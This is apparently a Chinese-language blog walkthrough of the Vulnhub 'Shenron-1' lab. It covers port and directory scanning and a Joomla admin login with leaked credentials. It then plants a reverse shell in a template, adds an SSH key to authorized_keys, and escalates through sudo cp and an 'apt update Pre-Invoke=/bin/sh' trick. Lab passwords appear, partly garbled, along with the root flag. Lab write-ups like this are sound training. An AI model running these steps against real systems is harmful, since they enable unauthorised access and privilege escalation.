Vulnhub-shenron-1

nmap扫描端口:

nmap 192.168.0.19 -p-

https://s4.ax1x.com/2022/01/05/TjpPr6.png

💡 开放80端口和22端口

web浏览器打开80端口:

https://s4.ax1x.com/2022/01/05/Tjppx1.png

💡 Apache服务的默认页面

web扫描器识别到是joomla框架:

https://s4.ax1x.com/2022/01/05/TjpkVO.png

gobuster扫描joomla后台路径:

gobuster.exe  dir -u http://192.168.0.19/joomla/ -w dir.txt

https://s4.ax1x.com/2022/01/05/TjpZPH.png

💡 后台路径是joomla/administrator/index.php

https://s4.ax1x.com/2022/01/05/TjpeGd.png

登录名和密码在/test/password文件的源码中:

https://s4.ax1x.com/2022/01/05/TjpS2R.png

https://s4.ax1x.com/2022/01/05/TjSxPJ.png

管理员是admin,密码是3iqtzi4RhkWANcu@ p a pa pa$

https://s4.ax1x.com/2022/01/05/TjpnxI.png

💡 管理员登录ok

编辑模板文件上传shell:

https://s4.ax1x.com/2022/01/05/Tjpds0.png

💡 编辑完模板文件然后要点击copy template,取个名字就可以保存成功了。

https://s4.ax1x.com/2022/01/05/TjpDdU.png

在error.php中插入shell,这样访问出现错误时,就会自动访问到error.php文件,就可以反弹。

提权:

nc监听端口:

nc.exe -lvvp 1234

访问错误地址反弹nc:

https://s4.ax1x.com/2022/01/05/TjproF.png

https://s4.ax1x.com/2022/01/05/Tjpyi4.png

💡 反弹成功

https://s4.ax1x.com/2022/01/05/Tjp6JJ.png

登录用户是www-data。存在另外两个用户一个是shenron,另一个用户是jenny。

在/var/www/html/joomla/configuration.php存在jenny的密码:

https://s4.ax1x.com/2022/01/05/TjerGV.png

💡 jenny的密码是Mypa$ w o r d i wordi wordinotharD@123

https://s4.ax1x.com/2022/01/05/TjpWsx.png

https://s4.ax1x.com/2022/01/05/Tjm1eJ.png

通过把ssh公钥写入jenny目录下的.ssh文件夹下的authorized_keys中,就可以用私钥登录到jenny。

cd .ssh
echo __public key__ >> authorized_keys
echo ssh-rsa "生成的公钥串" >> authorized_keys

https://s4.ax1x.com/2022/01/05/TjuSKS.png

💡 使用公钥文件登录

https://s4.ax1x.com/2022/01/05/TjubsU.png

💡 jenny登录成功,sudo -l 查看提权命令,jenny可以使用shenron的身份使用cp命令

使用shenron的cp命令替换.ssh文件夹下的authorized_keys,替换成jenny的公钥,这样就可以用jenny的私钥登录到shenron用户。

cp /home/jenny/.ssh/authorized_keys /tmp/  #复制jenny的authorized_keys文件到/tmp/两个用户都可以读取
sudo -u shenron cp /tmp/authorized_keys /home/shenron/.ssh/

https://s4.ax1x.com/2022/01/05/TjMe74.png

https://s4.ax1x.com/2022/01/05/TjQ9bD.png

https://s4.ax1x.com/2022/01/05/TjMfCn.png

https://s4.ax1x.com/2022/01/05/TjQE8I.png

💡 shenron用户的密码在/var/opt/password.txt

sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh #使用apt命令提权

https://s4.ax1x.com/2022/01/05/TjQmKf.png

https://s4.ax1x.com/2022/01/05/TjQl5j.png

💡 Your Root Flag Is Here :- aa087b2d466cd593622798c8e972bffb

下载地址:

https://www.vulnhub.com/entry/shenron-1,630/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值